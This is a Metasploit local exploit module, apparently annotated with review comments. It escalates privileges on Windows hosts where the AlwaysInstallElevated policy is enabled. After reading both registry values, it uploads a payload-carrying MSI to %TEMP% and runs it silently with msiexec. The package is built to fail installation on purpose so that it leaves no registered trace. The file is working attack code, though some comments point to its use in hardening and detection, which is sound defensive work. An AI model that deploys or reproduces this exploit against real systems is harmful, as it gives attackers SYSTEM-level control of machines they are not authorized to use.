##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
  # Local privilege escalation through the Windows Installer
  # "AlwaysInstallElevated" policy. `check` reads the policy value under both
  # HKLM and HKCU and reports Vulnerable only when both are present and
  # non-zero; `exploit` then writes a payload-carrying MSI under %TEMP% and
  # runs it through msiexec.exe. From a hardening standpoint the control is
  # simply the absence (or a value of 0) of either registry value, which is
  # exactly the condition `check` tests.
  Rank = ExcellentRanking

  # Mixins supplying the helpers used below (generate_payload_msi, write_file,
  # expand_path, cmd_exec, register_file_for_cleanup, registry_getvaldata).
  # Which helper comes from which mixin is not visible in this file.
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper
  include Msf::Post::File
  include Msf::Post::Windows::Registry

  # Registers module metadata with the framework plus two advanced options:
  #   LOG_FILE - optional remote path; when set, msiexec is passed "/l* <path>"
  #   QUIET    - when true (default), msiexec is passed "/quiet"
  # Both options are only consumed in `exploit`.
  def initialize(info = {})
    super(
      update_info(
        info,
        {
          'Name' => 'Windows AlwaysInstallElevated MSI',
          'Description' => %q{
This module checks the AlwaysInstallElevated registry keys which dictates if
.MSI files should be installed with elevated privileges (NT AUTHORITY\SYSTEM).
The generated .MSI file has an embedded executable which is extracted and run
by the installer. After execution the .MSI file intentionally fails installation
(by calling some invalid VBS) to prevent it being registered on the system.
By running this with the /quiet argument the error will not be seen by the user.
},
          'License' => MSF_LICENSE,
          'Author' => [
            'Ben Campbell',
            'Parvez Anwar' # discovery?/inspiration
          ],
          'Arch' => [ ARCH_X86, ARCH_X64 ],
          'Platform' => [ 'win' ],
          'SessionTypes' => [ 'meterpreter' ],
          'DefaultOptions' => {
            'WfsDelay' => 10,
            'EXITFUNC' => 'process',
            # NOTE(review): presumably consumed by generate_payload_msi when
            # building the package — the consumer is not visible here.
            'MSI::UAC' => true
          },
          'Targets' => [
            [ 'Windows', {} ],
          ],
          'References' => [
            [ 'URL', 'http://www.greyhathacker.net/?p=185' ],
            [ 'URL', 'http://msdn.microsoft.com/en-us/library/aa367561(VS.85).aspx' ],
            [ 'URL', 'http://rewtdance.blogspot.co.uk/2013/03/metasploit-msi-payload-generation.html']
          ],
          'DisclosureDate' => '2010-03-18',
          'DefaultTarget' => 0,
          'Notes' => {
            'Reliability' => UNKNOWN_RELIABILITY,
            'Stability' => UNKNOWN_STABILITY,
            'SideEffects' => UNKNOWN_SIDE_EFFECTS
          }
        }
      )
    )

    register_advanced_options([
      OptString.new('LOG_FILE', [false, 'Remote path to output MSI log file to.', nil]),
      OptBool.new('QUIET', [true, 'Run the MSI with the /quiet flag.', true])
    ])
  end

  # Reads AlwaysInstallElevated under the Installer policy key of HKLM first,
  # then HKCU. Returns Msf::Exploit::CheckCode::Safe as soon as either value
  # is nil (missing or unreadable, per the message printed) or == 0, and
  # Msf::Exploit::CheckCode::Vulnerable only when both are non-nil and
  # non-zero. All messages go through vprint_* and so appear only in verbose
  # mode.
  #
  # NOTE(review): any value that is neither nil nor 0 counts as "enabled";
  # whether registry_getvaldata can return non-integer data for this value is
  # not visible here, so a detection rule mirroring this logic should compare
  # against the raw DWORD.
  def check
    install_elevated = "AlwaysInstallElevated"
    installer = "SOFTWARE\\Policies\\Microsoft\\Windows\\Installer"
    hkcu = "HKEY_CURRENT_USER\\#{installer}"
    hklm = "HKEY_LOCAL_MACHINE\\#{installer}"

    local_machine_value = registry_getvaldata(hklm, install_elevated)

    if local_machine_value.nil?
      vprint_error("#{hklm}\\#{install_elevated} does not exist or is not accessible.")
      return Msf::Exploit::CheckCode::Safe
    elsif local_machine_value == 0
      vprint_error("#{hklm}\\#{install_elevated} is #{local_machine_value}.")
      return Msf::Exploit::CheckCode::Safe
    else
      vprint_good("#{hklm}\\#{install_elevated} is #{local_machine_value}.")
      # HKCU is consulted only once HKLM is enabled; the two branches above
      # return, so current_user_value is always assigned before the test below.
      current_user_value = registry_getvaldata(hkcu, install_elevated)
    end

    if current_user_value.nil?
      vprint_error("#{hkcu}\\#{install_elevated} does not exist or is not accessible.")
      return Msf::Exploit::CheckCode::Safe
    elsif current_user_value == 0
      vprint_error("#{hkcu}\\#{install_elevated} is #{current_user_value}.")
      return Msf::Exploit::CheckCode::Safe
    else
      vprint_good("#{hkcu}\\#{install_elevated} is #{current_user_value}.")
      return Msf::Exploit::CheckCode::Vulnerable
    end
  end

  # Runs `check` first and returns early unless it reports Vulnerable, then:
  #   1. builds the payload MSI (generate_payload_msi) under a random
  #      6-13 character alphabetic filename,
  #   2. writes it under %TEMP% on the target and registers it for cleanup,
  #   3. executes it with msiexec.exe, honouring LOG_FILE and QUIET.
  # The cmd_exec output is reported only in verbose mode; on Rex::TimeoutError
  # `result` is left nil and the feedback line prints with an empty value.
  def exploit
    return unless check == Msf::Exploit::CheckCode::Vulnerable

    # rand(8) is 0..7, so the basename is 6..13 letters plus ".msi".
    msi_filename = Rex::Text.rand_text_alpha((rand(8) + 6)) + ".msi"
    msi_source = generate_payload_msi

    # Upload MSI
    # expand_path presumably resolves %TEMP% on the target (not visible here);
    # strip removes any surrounding whitespace from the returned path.
    msi_destination = expand_path("%TEMP%\\#{msi_filename}").strip
    print_status("Uploading the MSI to #{msi_destination} ...")

    write_file(msi_destination, msi_source)
    register_file_for_cleanup(msi_destination)

    # NOTE(review): only nil counts as "unset"; an empty LOG_FILE string would
    # produce "/l* " with no path following it.
    if datastore['LOG_FILE'].nil?
      logging = ""
    else
      logging = "/l* #{datastore['LOG_FILE']} "
    end

    if datastore['QUIET']
      quiet = "/quiet "
    else
      quiet = ""
    end

    # Both option fragments carry their own trailing space, so the command
    # reads cleanly whether or not they are present.
    cmd = "msiexec.exe #{logging}#{quiet}/package #{msi_destination}"

    print_status("Executing MSI...")
    vprint_status("Executing: #{cmd}")
    begin
      result = cmd_exec(cmd)
    rescue Rex::TimeoutError
      # A timeout is reported but not treated as failure; `result` stays nil.
      vprint_status("Execution timed out.")
    end
    vprint_status("MSI command-line feedback: #{result}")
  end
end